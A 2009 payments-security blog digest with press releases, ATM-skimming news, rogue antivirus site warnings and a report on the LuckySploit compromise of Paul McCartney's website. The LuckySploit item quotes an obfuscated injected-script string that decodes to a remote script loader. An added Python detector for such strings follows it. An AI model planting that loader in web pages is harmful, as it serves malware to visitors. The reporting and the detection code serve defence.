Wednesday, April 8, 2009

Acculynk Claims Consumers Like Their Solution

Editor's Note:  This came across the news wires today and in fairness, I thought I'd share it with the PIN Payments News Blog readers.  After speaking with HomeATM CEO and Chairman, Ken Mages, he asked me to remind readers what he said a couple weeks back: PIN on PED vs. PIN on the Web

"I'll make this last promise or take a lunch bet with anyone...that once software PIN goes live,
within a month, an FTP site will arise with its users' PAN and PIN numbers.  I One-Hundred-Percent (100%) guarantee it."  - kgm - Chairman/CEO -
HomeATM ePayment Solutions

To read a White Paper comparison on "Hardware vs. Software" Security Click the Picture Above Left (PIN Debit Payment PDF) and it will open.  Here's Acculynk's Press Release:

Study Finds New Payment Software PaySecure Increases Debit Cardholder Confidence Online

Secure PIN Debit Payment Method Could Increase Online Debit Card Transactions and Lead to Additional Internet Purchases

SAN FRANCISCO--(BUSINESS WIRE)--A new Javelin Strategy & Research study reveals that a majority of surveyed debit cardholders feel confident about using their personal identification number (PIN) to make online purchases with PaySecure, a new Internet PIN debit payment method provided by Acculynk.

The study, commissioned by Acculynk and PULSE, evaluated debit cardholder perceptions and attitudes about PaySecure, and included 500 U.S. debit card users who purchased online in the last year. Participants used PaySecure for a mock online purchase and then answered a series of questions about their experience using the product.

According to the study, 80% of survey participants would use PaySecure when it is presented by a trusted merchant, 65% of survey participants would feel safer buying on the Internet with PaySecure, and 48% would buy more often on the Internet if they could pay with PaySecure.

“Our research shows that consumers are more willing to complete an online purchase when they feel the transaction is secure,” said James Van Dyke, Founder and President of Javelin.

“In the current economic climate, debit payment methods that increase consumers’ perceived security will be preferred by more consumers.”

Key Findings From the Custom Survey:


The study was commissioned by PaySecure provider Acculynk and PULSE and conducted by Javelin Strategy & Research. The study, conducted in March, 2009, recruited 500 U.S. adults to participate. Participants were targeted to obtain U.S. nationally representative groups based on age, gender and annual household income. To qualify for the study, participants were required to use their debit card for at least 40% of point of sale purchases and Internet purchases, and made a purchase on the Internet in the last twelve months. Participants used the PaySecure PIN-pad for a mock online purchase and then completed a survey of agree/disagree questions to question the product’s ease of use, consumer acceptance and perceived security. Agreement for an item was determined as 7 or greater on a 10 point scale.

About Javelin Strategy & Research

Javelin is the leading independent provider of quantitative and qualitative research focused exclusively on financial services topics. Based on the most rigorous statistical methodologies, Javelin conducts in-depth primary research studies to pinpoint dynamic risks and opportunities. Javelin helps its clients achieve their initiatives through three service offerings, including syndicated research subscriptions, custom research projects and strategic consulting. Javelin’s client list includes some of the largest banks, credit unions, card issuers, and technology enterprises in the financial services industry. For more information about this or other Javelin reports, please visit or call (925) 225-9100.

About Acculynk

Acculynk is a leading technology provider with a suite of software-only services that secure online transactions. Backed by a powerful encryption and authentication framework protected by a family of issued and pending patents, Acculynk’s services provide greater security, reliability, convenience and return on investment for consumers, merchants, networks, issuers and acquirers. For more information, visit


PULSE is one of the nation’s leading ATM/debit networks, currently serving more than 4,500 banks, credit unions and savings institutions across the country. PULSE is owned by Discover Financial Services (NYSE: DFS). The network links cardholders with more than 289,000 ATMs, as well as POS terminals at retail locations nationwide. The company is also a valued resource for industry research related to electronic payments and is committed to providing its participants with education on evolving products, services and trends in the payments industry. For more information, visit

Javelin Strategy & Research
Kathleen McCabe, +1-925-225-9100 ext. 15
Marketing Director



82% Concerned About Private Label Prepaid Cards

Private Prepaid Cards Take Lumps From Recession: Survey - 04..2009 - U.S. Banker Article
U.S. Banker | April 2009
By Joseph Rosta

Private-label prepaid cards are losing their luster because of the recession, according to an Aite Group research note based on a survey of 21 card industry executives.

Eighty-two percent of those participating say current economic conditions are having a “somewhat to very adverse” impact on the sale of private-label cards, as expanding retailer bankruptcies stoke consumer fears they could be stuck holding worthless and unredeemable gift and other prepaid cards from defunct chain stores.


ATM Skimming Victims Lose $50K (Video) | Buffalo, NY | ATM Skimming Victims Lose More Than $50,000

The United States Attorney's Office announced Tuesday it's prosecuting a Romanian man for stealing more than $50,000 through a scam known as ATM skimming.

Assistant U.S. Attorney Aaron Mango said Tiberiu Szebeni, 29, used an electronic faceplate, known as a skimmer, to steal account information from ATM customers. Typically, the device sits on top of the slot in which bank cards are inserted.

"When you put your card into the ATM, it passes through this skimming device, and the skimming device then records all of the information on your card," Mango explained.

Once the thieves have that information, all they need is your PIN number. Mango said that's typically obtained through the use of a tiny, pinhole camera with a view of the keypad, but he said thieves may also utilize a high-powered, zoom camera stationed somewhere in the distance.

Mango said once Szebeni obtained both the account and PIN numbers, he transferred that information to empty store gift cards. Then, by using the magnetic strip in each card, Mango said Szebeni essentially turned each one into a clone of the original ATM card.

Federal prosecutors have charged Szebeni with use of a fraudulent access device with intent to defraud. Secret Service agents arrested him at the Rainbow Bridge on March 31st after a tip from a Rochester resident led them to the Romanian citizen.


Paul McCartney Website LuckySploited

Source: scmagazineus
Complete item:

The official website for former Beatle Paul McCartney was compromised to infect users through drive-by downloads.

The site was attacked by the LuckySploit toolkit, according to web security firm ScanSafe, which discovered the hack. The toolkit was recently updated to include a set of HTML files that contain obfuscated and malicious JavaScript code, according to, a computer security website.

ScanSafe said in a statement that its researchers discovered the infection on Saturday, the same day McCartney reunited on stage with Ringo Starr for the first time in years. The toolkit was hidden behind an invisible frame on the site. When users visited, their machines were hit with an exploit that downloaded a rootkit.

Once the rootkit is installed "behind the scenes" on the victim's computer, thieves could steal personal information, such as credit card details and login credentials, according to ScanSafe.

"Once your computer is infected with a rootkit, none of your personal information is safe," said Spencer Parker, director of product management for ScanSafe, in a statement. "This is an extremely attractive target for cybercriminals given the level of attention McCartney is receiving at this moment."

McCartney's site quickly was fixed, according to ScanSafe. It is unclear how many users were compromised. A representative for the musician could not be reached for comment on Tuesday.


The website of famed singer Paul McCartney is the latest victim in a string of website compromises involving the Luckysploit exploit toolkit. The compromises are related to an outbreak of bank-related data theft trojans during the first quarter of 2009. These outbreaks track back to the Zeus botnet which was implicated in a $6 million commercial account heist on 20 European banks in the summer of 2008.

As far as exploit toolkits go, Luckysploit is a bit unusual inasmuch as it uses an asymmetric key algorithm (standard RSA public/private key cryptography) to encrypt the communication session with the browser.

Zeus bots are known for browser traffic sniffing, intercepting POST data and keystrokes associated with the active browser session as well as clipboard data pasted into the browser. While these actions facilitate Zeus' activities concerning banking theft, they could also lead to compromise of FTP credentials. For this reason, impacted sites may not just be spreading new Zeus banking trojans and bots; their management systems may also be infected with previous variants of Zeus bots and banking trojans.

Embedded scripts on impacted pages may appear as follows:

 var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";for(var i=0;i

Compromises have also been observed on flat HTML-only sites, furthering the likelihood that compromised FTP credentials may be the cause. As with most malware today, symptoms of a Zeus infection include the disabling of firewall or other security software. Zeus bots and trojans are also rootkit-enabled, which may hamper discovery efforts.

Source: E-Secure-IT
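
An added example, not part of the original post or of any vendor's tooling: a site operator can check pages pulled from the web root for the embedded-script pattern shown above by trying small constant character shifts on every string literal and flagging any that decode to a script or iframe tag. The string quoted in the post decodes with a shift of one; the surrounding HTML in SAMPLE_PAGE is constructed, and the function names are this example's own.

```python
import re

# Quoted string literals as they appear in inline JavaScript.
STRING_LITERAL = re.compile(r'"((?:[^"\\]|\\.)*)"|\'((?:[^\'\\]|\\.)*)\'')
# Markup that should never be hidden inside an encoded string.
MARKERS = ("<script", "<iframe")

# Constructed page: only the "source" string is taken from the post above.
SAMPLE_PAGE = r'''<html><body>
<h1>Constructed sample page</h1>
<script type="text/javascript">
var greeting = "Welcome to the constructed sample page";
</script>
<script type="text/javascript">
var source ="=tdsjqu!uzqf>#ufyu0kbwbtdsjqu#!tsd>#iuuq;0095/355/249/660hpphmf.bobmzujdt0hb/kt#?=0tdsjqu?"; var result = "";
/* decoder loop not reproduced here: it is cut off in the post */
</script>
</body></html>'''


def shift_decode(text, shift):
    """Subtract `shift` from each code point; unprintable results become '?'."""
    out = []
    for ch in text:
        cp = ord(ch) - shift
        out.append(chr(cp) if 0x20 <= cp <= 0x7E else "?")
    return "".join(out)


def find_shifted_markup(page, max_shift=8, min_len=16):
    """Return one finding per string literal that hides markup behind a constant shift."""
    findings = []
    for match in STRING_LITERAL.finditer(page):
        literal = match.group(1) if match.group(1) is not None else match.group(2)
        if len(literal) < min_len:
            continue  # too short to hold a whole tag
        for shift in [s for s in range(-max_shift, max_shift + 1) if s != 0]:
            decoded = shift_decode(literal, shift)
            if any(marker in decoded.lower() for marker in MARKERS):
                findings.append({
                    "line": page.count("\n", 0, match.start()) + 1,
                    "shift": shift,
                    "decoded": decoded,
                })
                break  # one finding per literal is enough
    return findings


if __name__ == "__main__":
    for finding in find_shifted_markup(SAMPLE_PAGE):
        print(f"line {finding['line']}: shift {finding['shift']}: {finding['decoded']}")
```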


HomeATM Press Release

With PCI PED 2.0 Certification in Hand, HomeATM Targets Funds Transfers

HomeATM Announces Strategic Partnership to Deploy 250,000 Terminals with Major Remittance Provider


PRLog (Press Release) – Apr 08, 2009 – Chicago: HomeATM ePayment Solutions, a leading provider of secure hardware and software solutions, today announced that it has signed a contract with a major remittance provider to provide 250,000 Safe-T-PIN (TM) terminals to its customers.

The Safe-T-PIN point of sale terminal, manufactured by HomeATM, is the first ever Internet PED to achieve PCI PED 2.0 certification from the Payment Card Industry. Safe-T-PIN provides secure two factor authentication for e-commerce transactions and secure log-in.

When combined with HomeATM's proprietary electronic money transfer platform, the SafeTPIN allows consumers and businesses alike, to swipe any bank card, enter their PIN and transfer money in real-time to the recipient.

With the HomeATM Funds Transfer application, it's no longer necessary to go through the hassles of driving or walking to a money transfer location to send or receive money. It can be done in the safety of your own home in real time. HomeATM also eliminates the burden of having to preload third party cards...simply swipe your existing bank card, enter your PIN and send. The recipient swipes their bank card, enters their PIN and receives. Nothing could be more simple.

The pocket-sized Safe-T-PIN(TM) is USB "plug and play," eliminating the need for drivers or downloads. Additionally, it works with any operating system or browser. The device provides users with the added convenience of swiping their cards versus keying in their numbers and will work with any bank, card processor, and currency. The significance of this feat is that bank/military grade encryption (including 3DES and DUKPT key management) of financial data from beginning to end, is now affordable to the masses.

SourceMedia's ATM&Debit News has featured HomeATM on a front page article in their latest issue which you can access at

About HomeATM's Safe-T-PIN (tm)

The HomeATM Safe-T-PIN is the world's only PCI PED 2.0 Certified E-Commerce Device.  Employing Triple DES Encryption and DUKPT Key Management, it provides complete end-to-end encryption protecting the user's card data from beginning to end.

About HomeATM

HomeATM owns a global patent for secure Internet PIN based transactions. Leveraging our E2EE PCI 2.0 PED certified solution, a merchant or remitter can move funds from their bank account or open loop/closed loop payment card in real-time. Utilizing HomeATM's patented solution with a bank issued card alleviates the burden for merchants to address fraud issues as HomeATM leverages the issuing bank's KYC/AML (Know Your Customer/Anti-Money Laundering) protocols. No other payment solution serves Person-to-Person, Business-to-Consumer, Business-to-Business, and Mobile Payments with the speed, security and cost-effectiveness of HomeATM. HomeATM is EMV ready and already enjoys strategic relationships with Cardinal Commerce and UATP.

For further information, visit: or contact Mitchell Cobrin, COO

# # #


Wolf in Sheep's Clothing - Security Software

Rogue security software now a top threat - Computer Business Review : News
Published:08-April-2009 | By Kevin White

Microsoft charts rise of malware in fake security software

(Editor's Note:  I've provided examples of Rogue Software Sites below)

Security intelligence gathered by Microsoft Corp shows a significant increase in rogue security software or ‘scareware’ that lures people into paying for protection that, unknown to them, is actually malware often designed to steal personal information.

According to the latest Microsoft Security Intelligence Report released today, rogue programmes known as Win32/FakeXPA and Win32/FakeSecSen were detected on more than 1.5 million computers.

Win32/Renos, another threat that is used to deliver rogue security software, was detected on 4.4 million unique computers, an increase of 67% over the first half of 2008.

Vinny Gullotto, general manager of the Microsoft Malware Protection Centre said, "We see cybercriminals increasingly going after vulnerabilities in human nature rather than software."

He said the security industry needs to combat the next generation of online threats through a community-based defence and broad industry cooperation with law enforcement and the public.

Rogue security software and other social engineering attacks compromise people's privacy and are costly; some take personal information and tap into bank accounts, while others infect computers and rob businesses of productivity.

Steps can be made to counter the problem, and the report recommends that security managers always configure computers to use Microsoft Update instead of Windows Update.

They should also use the Microsoft Security Assessment Tool (MSAT) to help assess weaknesses in their IT security environment.

Individuals are warned not to follow advertisements for unknown software that appears to provide protection and should avoid opening attachments or clicking on links to documents in e-mail or instant messages that are received unexpectedly or from an unknown source.

The report also cited the biggest cause of data breaches as lost and stolen computer equipment, which it reckons makes for 50% of all reported incidents.

PIN Payments News is Providing Warnings on the following rogue sites:

is a scam website designed to sell rogue anti-spyware programs. Upon entering the website you will be greeted by a fake online system scan, which returns an exaggerated report full of non-existent infections. Afterwards the website will display some popups, which read:

    "The page at says:   Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC"

or

    " says:  Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! System Security will perform a quick and free scanning of your PC for viruses and malicious programs."

is a malicious website, and should therefore be blocked using the HOSTS file.

is a malicious website, created for only one purpose - to sell rogue anti-spyware programs. provides a fake online system scan, which will attempt to scare the user with fake threats. Afterwards it will display a few popups with the same reason in mind. The popups read:

    "The page at says:      Your computer remains infected by viruses! They can cause data loss and file damages and need to be cured as soon as possible. Return to System Security and download it secure to your PC"

or

    "http://WWWMobileReads com says:      Warning!!! Your computer contains various signs of viruses and malware programs presence. Your system requires immediate anti viruses check! System Security will perform a quick and free scanning of your PC for viruses and malicious programs."

is a malicious website and should therefore be blocked using the HOSTS file.


Attack of the Card Skimmers - Gizmodo

Source: Gizmodo
Complete item:

Previously on C.S.I... a man found an actual card skimmer in the wild, in the flesh. Today, Gizmodo reader Sean became the card skimmer/PIN camera's latest almost-victim. Where? Chase Bank in Manhattan, East Village.

Sean Seibel was inside a local Chase bank where he inserted his ATM card into one of two side-by-side automatic teller machines. When the machine told him it could not read his card, it took him a bit of jiggling to get his card back. He tried it a couple more times and got the same results. Before trying the other machine, he inspected the slot of the current ATM he was using and realized that it had a false plastic cover attached to the slot. The amazing thing about the cover was that the translucent green plastic matched the card reader slot perfectly, meaning that it was made specifically for Chase ATMs. After snapping a few photos with his iPhone, he alerted the branch manager and explained what happened.

As he was leaving, Seibel remembered reading about card skimmers having small cameras in the proximity in order to read PIN pad activity, so naturally, he went back to the ATM to inspect, which is where he found an extra mirror attached to the vandalized machine that the other ATMs didn't have. Drilled into the mirror was a tiny pinhole with a camera inside, directed at the PIN pad. Seibel alerted the branch manager again and asked Chase why they hadn't inspected the ATM after he had warned them the first time. Chase honestly replied that they hadn't thought of it because they had never encountered that sort of thing before.
